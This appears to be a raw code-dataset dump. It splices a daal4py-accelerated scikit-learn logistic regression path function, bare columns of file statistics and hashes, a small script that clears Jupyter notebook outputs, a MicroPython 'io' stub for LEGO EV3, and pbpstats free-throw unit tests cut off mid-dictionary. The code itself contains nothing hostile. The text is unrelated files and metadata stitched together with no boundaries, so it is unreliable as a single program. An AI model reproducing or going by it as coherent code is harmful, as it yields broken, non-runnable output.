If None, then it is assumed that the given problem is binary.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
For the liblinear and lbfgs solvers set verbose to any positive
number for verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear', 'sag', 'saga'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
Initialization value for coefficients of logistic regression.
Useless for liblinear solver.
class_weight : dict or 'balanced', optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1', 'l2', or 'elasticnet'
Used to specify the norm used in the penalization. The 'newton-cg',
'sag' and 'lbfgs' solvers support only l2 penalties. 'elasticnet' is
only supported by the 'saga' solver.
intercept_scaling : float, default 1.
Useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equal to
intercept_scaling is appended to the instance vector.
The intercept becomes ``intercept_scaling * synthetic_feature_weight``.
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
multi_class : str, {'ovr', 'multinomial', 'auto'}, default: 'ovr'
If the option chosen is 'ovr', then a binary problem is fit for each
label. For 'multinomial' the loss minimised is the multinomial loss fit
across the entire probability distribution, *even when the data is
binary*. 'multinomial' is unavailable when solver='liblinear'.
'auto' selects 'ovr' if the data is binary, or if solver='liblinear',
and otherwise selects 'multinomial'.
.. versionadded:: 0.18
Stochastic Average Gradient descent solver for 'multinomial' case.
.. versionchanged:: 0.20
Default will change from 'ovr' to 'auto' in 0.22.
random_state : int, RandomState instance or None, optional, default None
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`. Used when ``solver`` == 'sag' or
'liblinear'.
check_input : bool, default True
If False, the input arrays X and y will not be checked.
max_squared_sum : float, default None
Maximum squared sum of X over samples. Used only in SAG solver.
If None, it will be computed, going through all the samples.
The value should be precomputed to speed up cross validation.
sample_weight : array-like, shape(n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
l1_ratio : float or None, optional (default=None)
The Elastic-Net mixing parameter, with ``0 <= l1_ratio <= 1``. Only
used if ``penalty='elasticnet'``. Setting ``l1_ratio=0`` is equivalent
to using ``penalty='l2'``, while setting ``l1_ratio=1`` is equivalent
to using ``penalty='l1'``. For ``0 < l1_ratio <1``, the penalty is a
combination of L1 and L2.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept. For
``multiclass='multinomial'``, the shape is (n_classes, n_cs,
n_features) or (n_classes, n_cs, n_features + 1).
Cs : ndarray
Grid of Cs used for cross-validation.
n_iter : array, shape (n_cs,)
Actual number of iteration for each Cs.
Notes
-----
You might get slightly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
.. versionchanged:: 0.19
The "copy" parameter was removed.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
solver = _check_solver(solver, penalty, dual)
# Preprocessing.
if check_input:
X = check_array(X, accept_sparse='csr', dtype=np.float64,
accept_large_sparse=solver != 'liblinear')
y = check_array(y, ensure_2d=False, dtype=None)
check_consistent_length(X, y)
_, n_features = X.shape
classes = np.unique(y)
random_state = check_random_state(random_state)
multi_class = _check_multi_class(multi_class, solver, len(classes))
if pos_class is None and multi_class != 'multinomial':
if (classes.size > 2):
raise ValueError('To fit OvR, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = classes[1]
# If sample weights exist, convert them to array (support for lists)
# and check length
# Otherwise set them to 1 for all examples
if sample_weight is not None:
default_weights = False
else:
default_weights = (class_weight is None)
sample_weight = _check_sample_weight(sample_weight, X,
dtype=X.dtype)
daal_ready = use_daal and solver in ['lbfgs', 'newton-cg'] and not sparse.issparse(X)
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "balanced", then
# the class_weights are assigned after masking the labels with a OvR.
le = LabelEncoder()
if isinstance(class_weight, dict) or multi_class == 'multinomial':
class_weight_ = compute_class_weight(class_weight, classes, y)
sample_weight *= class_weight_[le.fit_transform(y)]
# For doing a ovr, we need to mask the labels first. for the
# multinomial case this is not necessary.
if multi_class == 'ovr':
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
mask_classes = np.array([-1, 1])
mask = (y == pos_class)
y_bin = np.ones(y.shape, dtype=X.dtype)
y_bin[~mask] = -1.
# for compute_class_weight
if class_weight == "balanced":
class_weight_ = compute_class_weight(class_weight, mask_classes,
y_bin)
sample_weight *= class_weight_[le.fit_transform(y_bin)]
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if daal_ready:
w0 = np.zeros(n_features + 1, dtype=X.dtype)
y_bin[~mask] = 0.
else:
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
else:
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if solver not in ['sag', 'saga']:
if daal_ready:
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
else:
lbin = LabelBinarizer()
Y_multi = lbin.fit_transform(y)
if Y_multi.shape[1] == 1:
Y_multi = np.hstack([1 - Y_multi, Y_multi])
else:
# SAG multinomial solver needs LabelEncoder, not LabelBinarizer
le = LabelEncoder()
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
if daal_ready:
w0 = np.zeros((classes.size, n_features + 1),
order='C', dtype=X.dtype)
else:
w0 = np.zeros((classes.size, n_features + int(fit_intercept)),
order='F', dtype=X.dtype)
if coef is not None:
# it must work both giving the bias term and not
if multi_class == 'ovr':
if coef.size not in (n_features, w0.size):
raise ValueError(
'Initialization coef is of shape %d, expected shape '
'%d or %d' % (coef.size, n_features, w0.size))
if daal_ready:
w0[-coef.size:] = np.roll(coef, 1, -1) if coef.size != n_features else coef
else:
w0[:coef.size] = coef
else:
# For binary problems coef.shape[0] should be 1, otherwise it
# should be classes.size.
n_classes = classes.size
if n_classes == 2:
n_classes = 1
if (coef.shape[0] != n_classes or
coef.shape[1] not in (n_features, n_features + 1)):
raise ValueError(
'Initialization coef is of shape (%d, %d), expected '
'shape (%d, %d) or (%d, %d)' % (
coef.shape[0], coef.shape[1], classes.size,
n_features, classes.size, n_features + 1))
if daal_ready:
w0[:, -coef.shape[1]:] = np.roll(coef, 1, -1) if coef.shape[1] != n_features else coef
else:
if n_classes == 1:
w0[0, :coef.shape[1]] = -coef
w0[1, :coef.shape[1]] = coef
else:
w0[:, :coef.shape[1]] = coef
C_daal_multiplier = 1
# commented out because this is Py3 feature
#def _map_to_binary_logistic_regression():
# nonlocal C_daal_multiplier
# nonlocal w0
# C_daal_multiplier = 2
# w0 *= 2
if multi_class == 'multinomial':
# fmin_l_bfgs_b and newton-cg accepts only ravelled parameters.
if solver in ['lbfgs', 'newton-cg']:
if daal_ready and classes.size == 2:
w0_saved = w0
w0 = w0[-1:, :]
w0 = w0.ravel()
target = Y_multi
if solver == 'lbfgs':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_and_grad
else:
func = lambda x, *args: _multinomial_loss_grad(x, *args)[0:2]
elif solver == 'newton-cg':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = lambda x, *args: _multinomial_loss(x, *args)[0]
grad = lambda x, *args: _multinomial_loss_grad(x, *args)[1]
hess = _multinomial_grad_hess
warm_start_sag = {'coef': w0.T}
else:
target = y_bin
if solver == 'lbfgs':
if daal_ready:
func = _daal4py_loss_and_grad
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
func = _logistic_loss_and_grad
elif solver == 'newton-cg':
if daal_ready:
daal_extra_args_func = _daal4py_logistic_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = _logistic_loss
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
hess = _logistic_grad_hess
warm_start_sag = {'coef': np.expand_dims(w0, axis=1)}
coefs = list()
n_iter = np.zeros(len(Cs), dtype=np.int32)
for i, C in enumerate(Cs):
if solver == 'lbfgs':
if daal_ready:
extra_args = daal_extra_args_func(classes.size, w0, X, target, 0., 0.5 / C / C_daal_multiplier,
fit_intercept, value=True, gradient=True, hessian=False)
else:
extra_args = (X, target, 1. / C, sample_weight)
iprint = [-1, 50, 1, 100, 101][
np.searchsorted(np.array([0, 1, 2, 3]), verbose)]
opt_res = optimize.minimize(
func, w0, method="L-BFGS-B", jac=True,
args=extra_args,
options={"iprint": iprint, "gtol": tol, "maxiter": max_iter}
)
n_iter_i = _check_optimize_result(
solver, opt_res, max_iter,
extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)
w0, loss = opt_res.x, opt_res.fun
if daal_ready and C_daal_multiplier == 2:
w0 *= 0.5
elif solver == 'newton-cg':
if daal_ready:
def make_ncg_funcs(f, value=False, gradient=False, hessian=False):
daal_penaltyL2 = 0.5 / C / C_daal_multiplier
_obj_, X_, y_, n_samples = daal_extra_args_func(
classes.size, w0, X, target, 0., daal_penaltyL2, fit_intercept,
value=value, gradient=gradient, hessian=hessian)
_func_ = lambda x, *args: f(x, _obj_, *args)
return _func_, (X_, y_, n_samples, daal_penaltyL2)
loss_func, extra_args = make_ncg_funcs(func, value=True)
grad_func, _ = make_ncg_funcs(grad, gradient=True)
grad_hess_func, _ = make_ncg_funcs(hess, gradient=True)
w0, n_iter_i = _newton_cg(grad_hess_func, loss_func, grad_func, w0, args=extra_args,
maxiter=max_iter, tol=tol)
else:
args = (X, target, 1. / C, sample_weight)
w0, n_iter_i = _newton_cg(hess, func, grad, w0, args=args,
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
coef_, intercept_, n_iter_i, = _fit_liblinear(
X, target, C, fit_intercept, intercept_scaling, None,
penalty, dual, verbose, max_iter, tol, random_state,
sample_weight=sample_weight)
if fit_intercept:
w0 = np.concatenate([coef_.ravel(), intercept_])
else:
w0 = coef_.ravel()
elif solver in ['sag', 'saga']:
if multi_class == 'multinomial':
target = target.astype(X.dtype, copy=False)
loss = 'multinomial'
else:
loss = 'log'
# alpha is for L2-norm, beta is for L1-norm
if penalty == 'l1':
alpha = 0.
beta = 1. / C
elif penalty == 'l2':
alpha = 1. / C
beta = 0.
else: # Elastic-Net penalty
alpha = (1. / C) * (1 - l1_ratio)
beta = (1. / C) * l1_ratio
w0, n_iter_i, warm_start_sag = sag_solver(
X, target, sample_weight, loss, alpha,
beta, max_iter, tol,
verbose, random_state, False, max_squared_sum, warm_start_sag,
is_saga=(solver == 'saga'))
else:
raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
"'newton-cg', 'sag'}, got '%s' instead" % solver)
if multi_class == 'multinomial':
if daal_ready:
if classes.size == 2:
multi_w0 = w0[np.newaxis, :]
else:
multi_w0 = np.reshape(w0, (classes.size, -1))
else:
n_classes = max(2, classes.size)
multi_w0 = np.reshape(w0, (n_classes, -1))
if n_classes == 2:
multi_w0 = multi_w0[1][np.newaxis, :]
coefs.append(np.require(multi_w0, requirements='O'))
else:
coefs.append(np.require(w0, requirements='O'))
n_iter[i] = n_iter_i
if daal_ready:
if fit_intercept:
for i, ci in enumerate(coefs):
coefs[i] = np.roll(ci, -1, -1)
else:
for i, ci in enumerate(coefs):
coefs[i] = np.delete(ci, 0, axis=-1)
return np.array(coefs), np.array(Cs), n_iter
if (LooseVersion(sklearn_version) >= LooseVersion("0.22")):
def _logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='auto',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
return __logistic_regression_path(X, y, pos_class=pos_class,
Cs=Cs, fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol, verbose=verbose,
solver=solver, coef=coef,
class_weight=class_weight,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling,
multi_class=multi_class,
random_state=random_state,
check_input=check_input,
max_squared_sum=max_squared_sum,
sample_weight=sample_weight,
l1_ratio=l1_ratio)
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='lbfgs', max_iter=100,
multi_class='auto', verbose=0, warm_start=False, n_jobs=None,
l1_ratio=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
self.l1_ratio = l1_ratio
elif (LooseVersion(sklearn_version) >= LooseVersion("0.21")):
def _logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
return __logistic_regression_path(X, y, pos_class=pos_class,
Cs=Cs, fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol, verbose=verbose,
solver=solver, coef=coef,
class_weight=class_weight,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling,
multi_class=multi_class,
random_state=random_state,
check_input=check_input,
max_squared_sum=max_squared_sum,
sample_weight=sample_weight,
l1_ratio=l1_ratio)
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='warn', max_iter=100,
multi_class='warn', verbose=0, warm_start=False, n_jobs=None,
l1_ratio=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
self.l1_ratio = l1_ratio
else:
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='warn', max_iter=100,
multi_class='warn', verbose=0, warm_start=False, n_jobs=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
| 44.327668
| 112
| 0.575869
| 5,763
| 46,943
| 4.483429
| 0.089363
| 0.021364
| 0.012772
| 0.013933
| 0.909513
| 0.89798
| 0.894187
| 0.891013
| 0.889233
| 0.889233
| 0
| 0.017001
| 0.33841
| 46,943
| 1,058
| 113
| 44.369565
| 0.814953
| 0.315553
| 0
| 0.886435
| 0
| 0
| 0.035517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014196
| false
| 0
| 0.025237
| 0.003155
| 0.053628
| 0.006309
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6738ead518800981ecb146de5aa559b1865476
| 248
|
py
|
Python
|
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
import os
import glob
for cf in glob.glob('*.ipynb'):
print('jupyter nbconvert --ClearOutputPreprocessor.enabled=True --inplace {}'.format(cf))
os.system('jupyter nbconvert --ClearOutputPreprocessor.enabled=True --inplace {}'.format(cf))
| 35.428571
| 97
| 0.729839
| 29
| 248
| 6.241379
| 0.551724
| 0.176796
| 0.430939
| 0.508287
| 0.718232
| 0.718232
| 0.718232
| 0.718232
| 0
| 0
| 0
| 0
| 0.112903
| 248
| 6
| 98
| 41.333333
| 0.822727
| 0
| 0
| 0
| 0
| 0
| 0.587045
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
6a7060af3c0dc58fca9f7975cb3470a8fc4aed16
| 1,471
|
py
|
Python
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 38
|
2020-10-18T21:59:44.000Z
|
2022-03-17T03:03:28.000Z
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 176
|
2020-10-18T14:31:03.000Z
|
2022-03-30T23:22:39.000Z
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 6
|
2019-10-08T05:31:21.000Z
|
2021-04-22T10:21:01.000Z
|
"""
Module: 'io' on LEGO EV3 v1.0.0
"""
# MCU: sysname=ev3, nodename=ev3, release=('v1.0.0',), version=('0.0.0',), machine=ev3
# Stubber: 1.3.2
class BytesIO:
''
def close():
pass
def flush():
pass
def getvalue():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def seek():
pass
def write():
pass
class FileIO:
''
def close():
pass
def fileno():
pass
def flush():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def readlines():
pass
def seek():
pass
def tell():
pass
def write():
pass
class IOBase:
''
SEEK_CUR = 1
SEEK_END = 2
SEEK_SET = 0
class StringIO:
''
def close():
pass
def flush():
pass
def getvalue():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def seek():
pass
def write():
pass
class TextIOWrapper:
''
def close():
pass
def fileno():
pass
def flush():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def readlines():
pass
def seek():
pass
def tell():
pass
def write():
pass
def open():
pass
| 10.896296
| 86
| 0.442556
| 157
| 1,471
| 4.127389
| 0.254777
| 0.356481
| 0.074074
| 0.092593
| 0.736111
| 0.728395
| 0.728395
| 0.728395
| 0.728395
| 0.728395
| 0
| 0.023171
| 0.442556
| 1,471
| 134
| 87
| 10.977612
| 0.767073
| 0.089735
| 0
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.425287
| false
| 0.425287
| 0
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
6aacc933e6ed593ff3f3573929f1d281375d77d6
| 14,865
|
py
|
Python
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 54
|
2019-10-16T00:10:51.000Z
|
2022-03-19T21:21:05.000Z
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 15
|
2019-11-19T01:20:52.000Z
|
2022-02-04T13:38:37.000Z
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 15
|
2019-11-19T11:54:51.000Z
|
2022-03-21T05:08:53.000Z
|
from pbpstats.resources.enhanced_pbp.data_nba.free_throw import DataFreeThrow
from pbpstats.resources.enhanced_pbp.stats_nba.free_throw import StatsFreeThrow
from pbpstats.resources.enhanced_pbp.stats_nba.field_goal import StatsFieldGoal
from pbpstats.resources.enhanced_pbp.stats_nba.foul import StatsFoul
def test_data_made_free_throw():
item = {
"evt": 110,
"cl": "01:09",
"de": "[NYK 17-27] O'Quinn Free Throw 2 of 2 (3 PTS)",
"locX": 0,
"locY": -80,
"mtype": 12,
"etype": 3,
"opid": "",
"tid": 1610612752,
"pid": 203124,
"hs": 17,
"vs": 27,
"epid": "",
"oftid": 1610612752,
}
period = 1
game_id = "0021900001"
event = DataFreeThrow(item, period, game_id)
assert event.is_made is True
def test_data_missed_free_throw():
item = {
"evt": 108,
"cl": "01:09",
"de": "[NYK] O'Quinn Free Throw 1 of 2 Missed",
"locX": 0,
"locY": -80,
"mtype": 11,
"etype": 3,
"opid": "",
"tid": 1610612752,
"pid": 203124,
"hs": 16,
"vs": 27,
"epid": "",
"oftid": 1610612752,
}
period = 1
game_id = "0021900001"
event = DataFreeThrow(item, period, game_id)
assert event.is_made is False
def test_stats_made_free_throw():
item = {
"EVENTNUM": 110,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "O'Quinn Free Throw 2 of 2 (3 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_made is True
def test_stats_missed_free_throw():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 2",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_made is False
def test_ft_1_of_2():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 2",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_1_of_2 is True
def test_ft_1_of_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 3",
"EVENTMSGACTIONTYPE": 13,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_1_of_3 is True
def test_ft_2_of_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 2 of 3",
"EVENTMSGACTIONTYPE": 14,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_2_of_3 is True
def test_num_ft_for_trip_is_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 3",
"EVENTMSGACTIONTYPE": 13,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.num_ft_for_trip == 3
def test_away_from_play_true():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"VISITORDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:35",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 21,
}
order = 1
make_event = StatsFieldGoal(make, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = make_event
make_event.previous_event = ft_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is True
def test_foul_on_made_shot_by_team_that_got_fouled_is_not_away_from_play_ft():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 2,
}
order = 1
make_event = StatsFieldGoal(make, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = make_event
make_event.previous_event = foul_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is False
def test_foul_on_made_shot_by_team_that_didnt_get_fouled_is_away_from_play_ft():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
